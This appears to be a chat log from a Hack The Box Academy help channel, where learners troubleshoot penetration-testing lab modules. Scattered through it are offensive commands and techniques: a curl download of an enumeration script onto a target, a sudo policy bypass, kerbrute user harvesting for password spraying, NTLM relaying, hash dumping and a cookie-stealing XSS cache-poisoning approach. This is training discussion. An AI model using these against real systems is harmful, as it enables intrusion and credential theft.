#modules

Finally someone else questioned this😭

It literally makes no sense unless it has 2 network interfaces

Which it didn’t

ok my bad, that was the first question. Im guessing something went wrong with the target and hence you got the flag.

and ill be honest with you it's definitely not the hardest question it's very straight forward

Highest rated then and kinda harder since I was writing shell script to prepare the script instead of doing that in ZAP.

??

God. They also taught you about burp brother why not use it?

Its the same purpose tool, I like ZAP's interface and open-source policy much better. I don't want to know too many tools, instead prefer to get god with one first.

Burpsuite encoder offers more encoding options then ZAP 😉

Bro wtf

How can I contact someone in authority?

the module has a whole page for one btw

That doesnt help this needs a lot more enumeration to sub directories

I see there is not targeti.p/cgi directory when we fuzz for it but when we fuzz for a bat file like targeti.p/cgi/*.bat i find one file i dont knw why that is like that since initialy simply targeti.p/cgi returns nothing like it doesnt exist

it gives a 404, but its still worth to fuzz anything in the cgi directory if you know its vulnerable to something

im pretty sure they can give a 404 on any page they like even if it exist

Can somebody Please help me regarding burpsuite I'm facing an issue

just ask it

Ya but when we fuzz THE directories to see what all exists by using ffuf target i.p/FUZZ we dont get a targeti.p/cgi directory

So we will think it doesnt exist right so then how will someone know to fuzz for a bat file like ffuf targeti.p/cgi/*.bat

While proxy is on in Burp Suite, when I request to the web, it doesn't give a response

When i disable foxyproxy extension everything works fine

because it has the exact version for a certain exploit

theres nothing more to it tbh

Same issue on tryhackme Attackbox + VM

we don't help with THM here

You Don't get the captured request?

isnt that the point?

Or the website just lags?

I do but web just got stucked on browser

u have to foward the request or stop the proxy

Did you look at burpsuite when the website gets stuck?

So the idea behind burpsuite is that it captures the request to the website you enter in the url so that you can see/modify it before sending it, and when you are ready to send it, you press forward to let it go

Okayy now i got it thanks alot actually I'm beginner

It's like you are a police officer in the street and you stop someone to inspect their car and then let them go when you are done

Hahahaha this really help me alot to understand thank you so much

Hey huys i neeed help, do i need to do that in burpsuit itself? or in my browser ?

im a little bit stuck ^^

it says in browser

what module is that?

thought they used foxy proxy for that

payloads and shelss

im restarting my vm give me a sec

how can i do that i never did this kind of thing ^^

is it not that in burp suite?

do you have foxyproxy?

its not in burp

nope

its in firefox

go to firefox setting then search network

in the SCCM module in the AD path, SCCMhunter is not printing all of the expected output. The pivot is functioning, the nmap scan displays services as expected in the internal network. Not sure if this is just me or not. It returns "connection failed" in the table for the SiteCodes.

If you are on Firefox go to settings and search " proxy "

Or just use foxy proxy like everyone

i have Q about Filetransfare module

for exmaple this:

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

the url from my host or taget host ?

This is downloading from the Internet

However if you want to copy the script from your attack box into the target box ( for example the target host doesn't have Internet interface)
Then in your attack box you spin a python server in the directory of the thing you want to transfer
And then go to the target and do
Curl -o /path/to/save/file.extension http://your_ip:python_server_port/path/to/file.extension

never used those kind of things for the moment but i found my way ^^

in they examples they used https so when i use http or https ,thanks anyway

Hey guys! I'm having some trouble with the nmap easy lab, even though I feel I have the answer. I did a -A -sV -T4 -Pn <IP> scan and I got the OS name. But for some reason it's still not taking it. Does anyone know if I'm missing anything?

Good day everyone. i noticed in the active directory module on the CPTS path i noticed that HTB consistently keeps calling inlanefreight.local(root-domain) and logisticsfreight.local (tree-root domain) as a cross forest trust in subsequent sections even though they are in the same forest which i think it is an intra forest. I think a cross forest trust deals with 2 root domains in different forest. Is there something I am missing

you can use this (sudo nmap <IP> -Pn -sS -v2 -n) to see what port is opened and use (ncat -nv <ip> 22) to grab the flag banner.

I’ll try that, thank you!

lol

it's one word all lowercase

Yeah I tried all of that, thank you though!

A cross forest trust deals with two domains in different forests.

You can find your information with PowerView's Get-ForestTrust:

TopLevelNames            : {FREIGHTLOGISTICS.LOCAL}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {FREIGHTLOGISTICS.LOCAL}
SourceName               : INLANEFREIGHT.LOCAL
TargetName               : FREIGHTLOGISTICS.LOCAL
TrustType                : Forest
TrustDirection           : Bidirectional```

You can also get the whole trust relationship information with Get-DomainTrustMapping

thanks. I will add it to my notes. however this relation isnt a cross forest trust right but rather intra-forest

I was able to get the answer using sudo nmap <IP> -sV -F -D RND:5 and then checked the OS for port 22. Thank you for the help.

is that the first module you completed?

The quality of the modules is really unmatched. I'm sure you're in for a lot more you'll enjoy.

hey guys i need some help, im currently attempting to do the skill assessmnet for stack-based buffer overflows on windows x86 and I am not 100% sure how to get the assessment.zip onto the rdp machine. I am using the pwnbox

i like scp

scp?

yeah.

please explain 🙂

HTB says 1 day = 8 hours. don't listen to those though, some of those that were longer took me way less time than it said, and vice versa. it really depends on the person and how well they grasp the subject. you can take a lot longer than what it says too if you get stuck which will probably happen. just go at your own pace.

the box doesnt have internet, would it still be able to access the http server?

are you transferring from linux to windows or linux to linux

its all being done through the instance that htb provides, i tried to go through my kali vm but the connection keeps getting dropped after I RDP'd into the vm

also after i RDP into the windows vm i cant see any part of my kali vm so idk how to move stuff from the kali vm to the windows i rdp into

what RDP app are you using

xfreerdp

try adding /drive:/home/%user%/Desktop or whatever folder you want to the command, that will create a shared folder you can put files into

so "xfreerdp /drive:/home/%user%/Desktop /u:htb-student /p:Academy_student! /v:x.x.x.x /f" ?

yeah pretty much, it's just another xfreerdp parameter

okay ill try that out thank you, and just so i dont goof this up, the %user% am i replacing that with my host username?

yes, or replace the whole folder path with any other path you want to mount

that was just an example

okay thanks again! ill try it out ad let you know if it worked for me

guys its not liking any of those commands

What did you try Trippy?

xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student,/D:\Downloads/dynamic-resolution/floatbar:sticky:on,default:visible,show:always

xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student\home\parrot\Downloads /dynamic-resolution/floatbar:sticky:on,default:visible,show:always

xfreerdp /drive:D:\Downloads /u:htb-student /p:Academy_student! /v:10.129.47.198

xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /drive:D:\Downloads /f

you don't use the drive of the remote computer

you're sharing from the computer you're using the xfreerdp command

in that case wouldnt this command work? "xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student\home\parrot\Downloads /dynamic-resolution/floatbar:sticky:on,default:visible,show:always"

before typing xfreerdp type pwd, then use that path.

linux doesn't use c: or d:

okay so i did that and now im RDP'd into the windows vm, how do i get that .zip file in there now?

go to file explorer then my computer

i dont have an option for my computer

okay so im assuming that drive at the bottom is for the instances parrot OS, i cant get the zip file in there either, even if i try to log into htb through the parrot vm it thinks im a bot so i cant log in

if i try to drag and drop the zip from host to parrot it gets blocked

well yeah

using your own vm is a lot easier, you can transfer files from your host to your vm, and from the vm to the target

i didn't realize you were trying to transfer things to the pwnbox from your computer

i would love to use my own vm, but it keeps dropping connection after 5 minutes

you could not use the pwnbox and connect your windows machine to the vpn and rdp in that way probably

you didn't have the pwnbox active at the same time as your vm did you?

mmmmmm i probably did tbh

lemme try with the instance off

yeah that was probably the cause of your connectivity issues then, the pwnbox uses the same ip as your vpn would use

ahh i got it moved over, im gonna try this! thanks so much man

when sending a curl request is there a way to not get the body to print?

you can output it to a file with -o

wdym

do you just want the headers?

like if i run -v to get more verbose but dont want my terminal to get filled with the returned html and have to scroll up

i dont think thats really possible unless you grep for certain things

do u just want it not on ur terminal or in a file like supernuts said

Hey guys i am new to this channel , i need a small hint on AD skill assessment part 2 , question i am stuck on locate a configuratiom file containing mssql connection string? I only need small nudge. Thanks

you may need to solve the next question , before solving this

Guys just a random question how long did it take you guys to complete cpts path (penetration tester path)

you should find a way to gain more control in this machine

depends on your skills/knowledge , time you invest ....

Let me check thanks 😊

How long did it take you?

around 3-4 months , but I was giving it a lot of time

I am 3 months in, I alternate between doing modules and doing machines (easy ones to start with) and I'm about 40% in

A few hours a day

How many hours in a day?

sometimes 12+ , sometimes 4-5 depends on my mod

Oh

And when did you start doing boxes?

90% done in almost 2 months now, but some background helped

Like after the path or mid path

Some background as in?

but sometimes I wasted times overthinking stuff or not understanding the sections

ejpt and pjpt but mostly pjpt helped

didnt learn much from ejpt

So I ||logged in as user through Impacked-mssqlcient , I enumerate all the databases but did not get anything , I also try to enable xp_cmdshell but I dont have enough rights to run cmd command , so what should I do next ||

and about the 4 months , I also did some extra modules not inlcuded in path

||you sure you don't have enough perms to run xp_cmdshell||

did you login as the right user?

Which modules?

the|| user is br086||

dont think so

some CBBH and the buffer overflow modules and the haschat module

Oh

I am currently in infosec path and man it took me 3 weeks to complete the linux fundamentals

did you find the config file?

I enumerated the four databases but did not find anything or miss something I guess

enumerate everything again once u gain access to another user

it's totally okay

which user I only got two users now with passwords

try looking at smb

snaffler is also a useful tool

I ran snaffler but did not get anything

for both users?

nooooooooo

so we have run for both users ?

yeah becuase they both have different rights

enumeration is an iterative process

you should find another user using this

got it

refer back to the sql database enumeration notes from previous modules

i just did this, so feel free to dm for some nudges

I forgot this like whenever we find a new user , we have to enumerate again becuase this user may be have more rights

he was missing a step

ah thought he was already logged in with the cred file

I got it thank you , I thought snaffler works like responder I did not know it run with different user context it like how we enumerate smb shares

Thank you!!!

the hint for that step is useful :^)

I thought they were saying that for sql user like I cant execute command cmd commands but I can read the databases 😦

I know. Not sure if it has means to save the FUZZer? In Zap, I always had to set up the fuzzer anew from scratch which is why I see some advantage in encoding in fishscript, so my list doesn't need to be processed any further and is ready.

anyone else having the proxy time out on the SCCM module - SCCM Site Takeover 1 exercise? Can't get it to connect over mssql + proxychains despite having successful pivot tunnel still active, socks proxy session as SCCM01$ to the target mssql://172.50.0.30, I increased timeouts in proxychains4.conf, double checked the ports and IPs, PetitPotam is successful, the relay is successful - but the mssql session will not open. Used root / sudo shell as it mentioned, not sure what the issue is and I've now rebuilt the setup three times with the same result.

No one experience this?? Everything just magically works for you? I really need to figure out why its so slow, and why it constantly just hangs, but not sure what is wrong. Would really appreciate some advice on best practices to make the setup with HTB work. I use my own Kali VM on virtualbox, and have resetted, swithced regions, re-downloaded vpn pack a number of times...

Module: Linux Privilege Escalation
Section: Polkit
Link to section: https://academy.hackthebox.com/module/51/section/1591

Which versions of polkit are vulnerable? And is there a way to check or do I just have to run the poc to find out?

think you just have to run it

couldnt find a version anywhere

Hey Seus Crissed! that's like forever in computeryears 👩‍🦽

You can read the security advisory (Ubuntu is an example) to find out which version is vulnerable and from which version has been patched.
https://ubuntu.com/security/notices/USN-5252-1

im on the same, did you change RPORT to the one HTB gave you? and did you need to change the FILEPATH?

im only getting

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

restart the machine and change the rport,rhost, and filepath

i restarted the machine, Changed the rport and rhost to the one from htb. Tried diffrent filepath (both standard, to /flag.txt and /) but i still get same output

  Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     83.136.255.217   yes       The target host(s), see 
                                         /basics/using-metasploit.html
   RPORT      35722            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

are you able to open the ip in firefox?

just tested it

yeah

try restarting one more time 😭

if that doesnt work you might have to change vpns

tried again didnt work... lets try that too

i now tried to do it in the pawnbox and it worked somehow...

Hi,
Yes it requires to set the rhosts, rport and filepath to give the proper target for the exploit. It's great if you managed on your own from the pawnbox. Maybe an issue with the VPN?

Thanks for the help, yes its very likely the vpn thats causing the error or my kali vm. Everything worked as expected except the exploit so i thought i was the wrong one all along 😭 😂

Yes when starting to learn it's kinda hard to figure out whether exploits don't work or we don't use it correctly

So on the Pawnboxn does it also save the flag.txt on a hidden folder of your attacking machine?

Not sure if this is where I post this question if not I'm sorry, but can anyone help me with this and care to explain it? I'm on module 19 section 102. The question I'm stuck on is "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)"

include module name, section name, any solutions you've attempted, etc.

so that others can help you easier

Oh I'm sorry its "Network Enumeration With Nma" "Host and Port Scanning"

with Nmap*

I would run sudo nmap the IP -sS -p-

Hey, is it recommended to do the Documenting and Reporting Module after the Penetration Testing Process Module in the Penetration Testing job role path? because in the "Penetration Testing Process Module/Practice Section" the author mentioned to take minor technical and non technical documentation of each module to learn efficiently but to know how to take those documentation we should complete the Documentation and reporting module right?

it's recommended to take the modules in the path in order

the skills assessment for that module requires knowledge acquired from previous modules

it's also focused on documenting during a penetration test rather than general documentation

Hi I am going though Active Directory MOdule and I am a bit lost on why do we need autnentication via LDAP when we already have Kerberos ? can someone please guide

okay, i thought if i can able to know about how to perform this step 6 and 7 documentation stuff from the Documentation and Reporting Module module before continuing so I can complete those Tasks while doing each Module's in the path and learn efficiently. Thank you.

they're two different protocols/services, ldap doesn't handle authentication, kerberos does

ig Since the protocol provides different purpose and in the LDAP there is also Simple Authentication which does not involve the Kerberos (which comes under SASL Authentication) as you can read from the AD LDAP Authentication in that corresponding Module section(Kerberos, DNS, LDAP, MSRPC).

Ok..so in SASL..user gets authenticated using Kerberos…and then requests via TGS to access LDAP server…LDAP server then uses challenge/response with the user to authorize it and once authorized the user can access the information in AD like users/groups/printers etc via LDAP…

Is this correct process…if not can you share what’s the correct flow

@rustic sage selem me3lekoem bro

Add me got some questions for you

pretty much

technically sasl supports gssapi which is used to interface with kerberos

https://medium.com/@oviraj71/sasl-authentication-plain-scram-kerberos-gssapi-in-kafka-0b06b2fc3644

@next bronze any insights from your side about this please?

thanks a ton !

not too sure what you're asking... you want to write reports for the other modules in the path?

About the Technical documentation and non technical documentation for each module as like mentioned in the Penetration Testing Process Module's Practice section which you can see in that screen shot below that message.

just do the modules and take notes in your own style based on what works for you, that is just a suggestion

okay, Thank you. I thought if i followed those steps/Task mentioned in that section I could learn More effectively.

it could, but how everyone learn is different, do what works for you

ig after completing the Kerberos authentication and successfully getting access to LDAP server by TGS the challenge/response NTLM authentication will not occur since there is no need.

Ok 👌 thnx !!

Hey, I am doing the NTLM Cross-protocol Relay Attacks part of the NTLM relay attacks module. In the fourth exercise we are supposed to see NTLM authentication attempts from NPORTS over HTTP to relay to LDAP(S), but when I run Responder with all options set to ON I only see SMB authentication coming in.

Running python3 Responder/Responder.py -I ens192 -wPdv with everything in Responder.conf set to ON just to see the authentication attempt coming in

As root of course 🙂

just tried it an it worked for me, you don' thave to use any flags for responder

Might have to reset then

tested on EU3

Thanks. I'll pivot 😆

Thanks, On EU3 I see different auths coming in!

someone help i got tired of this even the easy lab

thats not how it works @safe robin

You'll have to get to the answer yourself

Also - when asking for help - add which module/section you are working on

try harder and get it worth it mate not like this 😄

With a screenshot, we don't know anything

i did i been doing it i used -d then source port 53 but cant able to get

its nmap Firewall and IDS/IPS Evasion - Easy Lab

look 2h of machine lifetime and i'm struggling with one question of easy lab

Are you working with pwnbox or via your vm?

relax, take a quick break then come back and start from zero, you maybe overthinking it OR something is laggy with the lab and u need to reset or smth

pwnbox

maybe

lemme try rq since u mentioned the module

sure

thanks @shell ore

no worries! 😄

@safe robin mate tell me what ur trying to do

also, should we take this for DMs is it better? to avoid spoiling for others or?

trying to find OS without alerting the administrator

Best to dm, since its a tier1 and you'd spoil 😉

ok DM me

got it

in the port forwarding with netsh. i got the file and 3 names in it. unable to understand the format of the answer

First name last name with a space

Like "john doe"

not case sensitive, so could write JoHn DOe (but why would you)

(PS: john doe is obviously not the answer, take the name you found in the file 🙂 )

there are 3 names.

From my memories, only one is a person's name

Ok, given his last name is funny. But the answer is there.
Worse case try all three. Make sure if you copy paste that there are no space AFTER (trailing spaces)

Hey guys im doing the skills engagement of the shell and apyload module, do you know how what i need to use here to go on the internet?

You can use Firefox by opening it from the console

flexing in there own environment lol

Anyone else notice the MSSQL, Exchange, and SCCM Attacks Skill Assessment box is very slow?

anything on this? I have set it up again with the same result: "ConnectionRefusedError: [Errno 11] Connection refused"
I checked the tunnel, still active with rdp box open and agent still connected

forgot to add this in as well, sorry

Hello, I need a nudge about Linux Privilege Escalation Sudo. Im in the root directory and see the flag.txt but when I cat it shows information about directories and not the actual flag.

hey guys, I've been researching a way to escape restricted shells, but couldn't find a useful resource until now.

here is the output i get: ~$ ls
*** forbidden command: ls

try sudo with proxychains when connecting to the socks connection

it's a root shell

you using the DEV version of impacket?

yeah I think thats your problem, you need to be using the DEV release to make mssqlclient.py work

I tried with the pre-installed one on the pwnbox, as well as cloning the repo they have in the guide

that's just straight up connection refused though

try with -debug

pls help

go to impackets github and install the DEV version. I am pretty sure I had your same issue last week and this solved it.

also this is not installed, impacket is still calling the older libraries

Hello, I need a nudge about Linux Privilege Escalation Sudo. Im in the root directory and see the flag.txt but when I cat it shows information about directories and not the actual flag.

providing the error would be helpful

[1,1,{"progname":"ncdu","progver":"1.14.1","timestamp":1727277461},
[{"name":"/root","asize":4096,"dsize":4096,"dev":64768,"ino":8194},
{"name":".viminfo","asize":8295,"dsize":12288,"ino":431},
{"name":".bashrc","asize":3106,"dsize":4096,"ino":276},
{"name":"flag.txt","ino":1789},

doesn't seem like you're in a real shell

what's the command and what steps did you do

im did the Sudo Policy Bypass

sudo -u#-1 /bin/ncdu

found the flag and then cat

hello all, i am trying to understand how to put the command in for HTB vpn i have read this but dont understand how to type it in the VM for it to generate a web broswer Connecting Using VPN
KingKevin@htb[/htb]$ sudo openvpn user.ovpn

did you check gtfobins?

also used this command LFILE=file_to_read
cat "$LFILE"

yes but did you check gtfobins

Using the dev branch. Also, I pasted the cmds for cloning the repo from the section; it should be a venv, looks like it is calling the libraries from where I downloaded it? (/Downloads/PetitPotam/impacket/.impacket)

following the steps there worked for me

ah ok so you installed with pip, then you have to check the network connection, use -debug if not wireshark

-debug gives basically the same output 😦

your proxychains is timing out

I tried increasing the timeout on the proxychains conf but no luck

is 9050 the correct port

it worked just had to reset the machine

they match

are you sure

does ntlmrelay use socks4 or 5

wait maybe I need to open a new shell 😮

so proxychains.conf has 1080 set for 127.0.0.1 socks4 and socks5, tried with each individually first. ntlmrelayx socks proxy is listening on 127.0.0.1 1080. but for some reason proxychains is still calling 9050 ? Not sure how to adjust this if the conf is updated; I tried in a new shell and same result - the relay is still active

send a screenshot of the config file

okay so first mistake was it was calling proxychains.conf and not proxychains4.conf - adjusted that now.

Resolved: it worked with socks5 and editing proxychains.conf, not proxychains4.conf

I have installed VMware and parrot. When i try to boot grub with my passphrase. I can only press enter which naturally gives me the wrong password, i can not write a single letter. If i press enter, then all of a sudden i can write but then it's just prompts. What to do?

Is it possible I need an older sharphound version because bloodhound is not unzipping or processing the uploaded .zip file?

if you're using the older version i.e the non docker version, yes

Bloodhound v 4.3.1

yep

sharphound will show the minimum version needed when you run it

Ok thanks

hello everyone, i am pretty much stuck at finding a flag under public exploit (Pentesting Basics under Getting Started section), tried running all the exploits found on metasploit but no session is getting created, please advice

https://academy.hackthebox.com/module/162/section/1572
I need a push on where to start I went through all the files in Obsidian. And it seems to me that I should find the password and login to log in on the WH website. But I couldn't find it in the files.

the creds are the same as rdp

go to that ip and port in your browser

Hey, kind of a stupid question a lil' bit but are these certifications good to put on a resume?

Hey im doing skill assesment 2 of attacking common applications anyone know how to find th fdqn of a vhost ??

Hey guys i need help on the shell an payload module,

i uploaded a webshell but i dont know where i can find it

it should be right in ur face

wdym?

thats the only way to get the login

sometimes you just have to guess what might be the login using context

you dont see a page of backups?

not really ^^

Hey im doing skill assesment 2 of attacking common applications anyone know how to find th fdqn of a vhost ??

dm a screenshot of the page

Any help?

Hello, sorry to interrupt but Active Directory Enumeration & Attacks >>> Attacking Domain Trusts - Child -> Parent Trusts - from Linux
looks like not working..
Starting the host and trying to connect with ssh return "Connection refused" and nmap doesn't reveal any 22/tcp open 😦

can you ping the ip?

check you vpn connection

did u look for vhosts?

did you just start the vm? takes a second to be fully online

Waited like 10min, didn't work, restarted the VM and waited 10 min again 😦 still doesn't work

try changing the vpn server and re download the vpn file

would also recommend double checking you're using the right creds for ssh

across a few of the ad modules the password you expect to use to login changes

ran into that myself

stuck with this in Firewall and IDS/IPS Evasion - Medium Lab module

Have you tried all of the possible nmap techniques that the module covered?

Yes, I have

and tried searching this but cant

maybe i need yo retake this module😭😭

you don't need to retake the module, you just need to go through the scan types again

are u sure cause even the easy one was difficult for me and i took help from acaard

well the module has a cheat sheet with Scanning Options section, go through it and try individual scan types. Do you know what nmap is and what its functionalities are? Not being able to do skill assessment simply means you are overlooking something or just giving up easily. Going through the module again? If you are certain you haven't learned anything then sure.

maybe I'm tired a little

I'll try again I'm not giving up easily i need to go through scan types and more specificly learn about packets

these ids/ips bypass is kweel stuff but its hard too😂🤌🤌

Maybe it’s for another user🥸

could be take frequent breaks.

just take a look at the cheat sheet and try them all out individually.

yeah i can do that but i wanna.knw why certain thing happended

hello just joined

yeah need a break i guess

well its solution was also confusing for me, but it worked

why can i not talk in the general section??

#welcome

I tried a command with ffuf but it failes

dm me

Every windows machine has a certain built-in user

this hint should also suffice

Not sure what I'm missing here. Should be basic, but get stuck. Metasploit module 39, section 415 (it's he third question where an old sudo version should be abused - the module that is named Sessions). I have || tried several exploits for the vulnerable sudo version, including a bash one (that requires password for current user which I don't have), a python exploit that failed, and a c exploit that I could not compile on the target, and that failed when compiling on attack machine ||. What am I missing?

Wym fails?like errors?

no spoilers please.

You’re right sorry got carried away by frustration

remove your chat

Have you tried other file formats?

tried straight up searching for the exploit with the sudo version inside metasploit?

Ah actually not... I'll do that, thank you!

It just hangs i enterd smthg wrong propably dnt knw what

@quick laurel try looking at limited file uploads section

no worries!

U didnt even close the quotes at the end

Did you find the first question?

Yes

I’ll do that, thank you

Done 👍

I found it no problem

Did u add the vhost correctly?

Thanks a lot, suspected that I totally missed something obvious. Shouldn't try to cross the bridge for water... 😅

heh dw I know how it feels, no worries.

That part is where im kinda confused adding the vhost part

Just add it to your /etc/hosts with the ip

Just like in the previous sections

It should be ip inlanefreight.local

Right

Yes

I put a .inlanefreight.local

Maybe that might have errored dont knw

U got it?

U also should’ve been able to find the vhost without ffuf

if im using curl and it doesnt work if the url doesnt include the www. does that just mean the name server doesnt contain the url without the www. or is something else going on?

Hi guys, I'm trying to perform a port forwarding within meterpreter in the module: Meterpreter Tunneling & Port Forwarding

However, anytime I try to execute the payload built with msfvenom I get a Segmentation Fault error.
I've done chmod +x on the file, i've started the handler and it simply gets closed due to this failure. Has anybody experience that ?

You created the payload for the right arch ?

That could explain a segfault

Yup got everything now trying to solve the last question to obtain reverse shell

Alright, then I suppose I was doubting properly. I'll check it out

Yes except the terminology you're using is a little off. It means there's a "www" DNS record for sure. Each record, like "www", can point somewhere different.

Where and how are you executing that payload?

I'm executing it on the pivot, pointing to my vm. The handler is ran pointing to 0.0.0.0. (actually I've pointed it to my tun0 at first, then thinking I was mistaken I pointed it to 0.0.0.0 after reviewing the chapter)

Ok so depending on Pivot arch (windows or unix) you might have created the payload with the wrong option.
If address was wrong, you'd just get a connection timed out or just nothing. Not a segfault.

If that's not the issue, check that your metasploit is up to date I guess...
But then maybe people more qualified than me can help

When a domain is pointed to an address without any record it's often referred to as a "naked domain". In your scenario there is no assignment (or just no web server at that address), just "www".

Is this a bind or reverse shell?

reverse

but at the same time, I'm not properly grasping why msfvenom is saying that

Is that the internal ip of the pivot host?

hmmm, shouldn't it be my own machine?

It goes to the internal Target-> internal pivot-host ip -> our machine

Shouldn’t you be executing that on the target?

What @safe star said ☝️

Trying to figure it out, because actually I needed to ping sweep from the pivot to the internal target.
Thus, I thought about (not sure whether it's strictly required or not because I suppose you can already ping sweep it freely from the pivot) having a reverse shell from the pivot to my machine and perform a ping / nmap scan from my attack host to the internal target

U can get a metepreter session using ssh login

Yea, I guess I'm getting a bit confused by all those techniques 😄
In this scenario, I thought about crafting a payload and reversing it to my machine.
At the same time, I guess I could also try with netcat

might be easier

It would be a lot better to just ssh in

yea, mine was mostly practicing, I was wondering why I couldn't achieve it, especially for the error returned above by msfvenom

Yup, much easier.
Or maybe just ssh -D for dynamic port forward and then ping sweep from your machine... That should work too @safe star right? (confirming since I remember being kinda confused too when I did this haha)

Yeah but this meterpreter, so I was suggesting use to the ssh_login module to get a meterpeter session that way

Yeah of course 🙂 Just wanted to make sure I wasn't spewing an incorrect solution :p Thanks!

Thank you guys 🙂 appreciate the tips!

damn, I think I got what I've forgot

I'm gonna try one last thing and let you know, just FYI 😄

actually im not sure about a ping sweep from our machine because it only accepts tcp connections

so you would need to do a sweep from the pivot host first

aight, I completely forgot to change my msfconsole payload 🥲

that was the reason why it wasn't working

https://academy.hackthebox.com/module/162/section/1572 I have a question. I need to elevate privileges to administrator. Or I can find his password in the public domain.

can i possibly get some help on AD enumeration & attacks skills assessment part 2? i cannot for the life of me transfer kebrute and powerview onto the windows machine. i've scp'd from the ssh jump box, i scp'd from my linux machine, i scp'd from the windows machine. nothing i'm doing is working. any hints, please?

are you using xfreerdp

if you are using xfreerdp then use /drive:share,.

have you tried python http server or impacket smbserver?

Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

File Upload Attack
Blacklist Filters

im trying all extensinos and no one is working

use the list they linked in the section

i already didit duh

the github repo?

YES

this will share a local directory from you linux to windows remote session

THE SECLIST ONE

Yes, but I had to use ssh -L 13389:172.16.7.50:3389 HTB-studebt@<target IP> in order to get xfreerdp to work.

thats not the only one

I didn't think of that 😒

believe me, i aleady dont need to try more extensions...

transfer file from you linux to pivot machine, then pivot machine to the target
if you use ligolo-ng to portforward then it will be easier

php2, php3, php4, php6, shtml, htm, html are the allowed, but arent renderizing the php code

you tried phtml?

but that is for windows servers

This all depends on what information you have been able to enumerate and if you can use any of the information they provided you. You can DM me where you are, what you know, what you have, etc.

ligolo-ng?

im dealing with linux server

worked just fine for me

the extension isnt any of the ones u just listed

great pivoting tool

https://www.youtube.com/watch?v=qou7shRlX_s&t=620s&pp=ygUJbGlnb2xvLW5n

you will thank me

Never heard of it, but I guess I can give it a shot.

https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

plus this resource

then give me a clue

Awesome, thank you. Let's see how it goes.

Abusing HTTP misconfig - Hard assessment
I poisoned the cache with a RXSS payload that send the cookie to interactsh
Still I am not getting any response from Admin in logs

i suggest, if u have the time, to redo the pivot skill assessment with it

+1

Do I need to include port in interactsh url, earlier labs didn't require port

are those the only extensions that were allowed to get uploaded?

you might get a better view in burp intruder

Yes, I didn't know that the response extension could execute PHP code, I must have done some research on that with those that were allowed by the server backend, thanks anyway, by the way the seclist one wordlist does work

ik but its full of unneeded extensions

Re: AD Enum > ACL Abuse Tactics — if adunn's password isn't in rockyou.txt (which it isn't, as I already tried it with Hashcat to no avail), then what wordlist is it in?

Never mind, John the Ripper found it. Seems to be my new favorite cracking tool given that it's much more accurate at finding things.

did you put the right format?

Hey anyone knws what payload to use to get a revershe shell in the end of skill assesment 2 in attacking common applications

did u check the version number?

It is a nagios x1 application

I tried to ececute a bash shell but didnt wrk

huh, if you are using same wordlist, shouldn't both tool crack the hash???

Should, but nope. John the Ripper cracks it while Hashcat exhausts, despite using rockyou.txt in both cases. Perhaps my row of 6-year-old GPUs is to blame, but they were working just fine with Hashcat this past spring.

Moving on: why is this happening in the DCSync lab? Any ideas? @cloud urchin?

u should get a reverse shell

already in bash

Mm dnt knw why i used rev shells created one

Started a netcat listner and al but no revshell got

why do u need revshells?

did u look up the version number?

Cause it asked to get a rev shell and get flG in the last question

you're talking about the revshells site right?

Yes

there is no need for that when there are automated exploits for the version

Ok

Still curious as to why XRDP is doing this while MSRDP isn't when attempting the AD Enum > DCSync lab, despite attempts to connect using identical syntax in both cases.

same happened to me, had to use remmina

Would KRDC work or not as well?

I used xfreerdp it works just fine

tbh rdp are kinda buggy in academy

not sure, never used it

Wonder if Wayland is the problem then. In my case:

wlfreerdp /u:htb-student /p:'Academy_student_AD!' /w:$(math "3840*0.75") /h:$(math "2160*0.75") /v:$ip

Running Garuda Dr460nized + Plasma 6 + BlackArch tooling on my personal attack machine, for context.

i'm doing the active directory module and i'm trying to use kerbrute with options -o to save the output to a file but its not working its creating an empty file

not sure what's the problem , I always use xfreerdp

you could try piping the output to tee -a out.file

might grab the ascii art and extra stuff tho

i'm trying to grap only the users so i can use them for password spray

use >

this will write everything including time etc can't use to password spray

kerbrute also does this just without the ascii art

use this , then parse yourself , use awk,grep

so u will have to filter

oh i see okay i will try grep then

HELP! Attacking Domain Trusts - Child -> Parent Trusts - from Linux. I desperately need a hint on how I can obtain the NTLM hash for the Domain Admin user bross. I got the shell running, but I am lost from here.

you got DA ?

yes

then you can use one of the attack to get the hash of any user you want

use mimikatz

did you dump hashes?

I think this is where I am getting stuck, am i supposed to be using mimikatz in the shell? and if so, I have the hardest time transferring the tool to the shell

transfering shouldn't be hard , use http or smb

raisechild.py dumped some hashes

i tried both of those, but I can try again and hopefully you can tell me what I am doing wrong

Hey there is there anyone into CTF I have something to discuss

send s screenshot of your command

Sorry if I am middle of some discussion

running this on my attack box:

u will need to do a double transfer

Need some help with the Command Injection skill assessment, just need a point in the right direction

like from the pwnbox, to the attack box, to the shell?

yes

trying now

i came with this not sure if there something simpler cat valid.txt |grep USERNAME | cut -d ":" -f4 | cut -d "@" -f1 > v.txt

okay

try testing out the parameters

hello guys is there anyone can give me hint about foothold in zephyer Pro lab i have tried alot of things but i couldnt make it

#welcome and go to the #1263635449335910531

Trying to find the input location

a bit hard to help because there are a lot of parameters but you should be able to find the one

in the url

hello on the password attacks module in the network services i have found the credentials but i cannot connect to the RDP service

i get 'Connection reset by peer' error

any help

ok, i have mimikatz on my attack box:

both these commands aren't working:

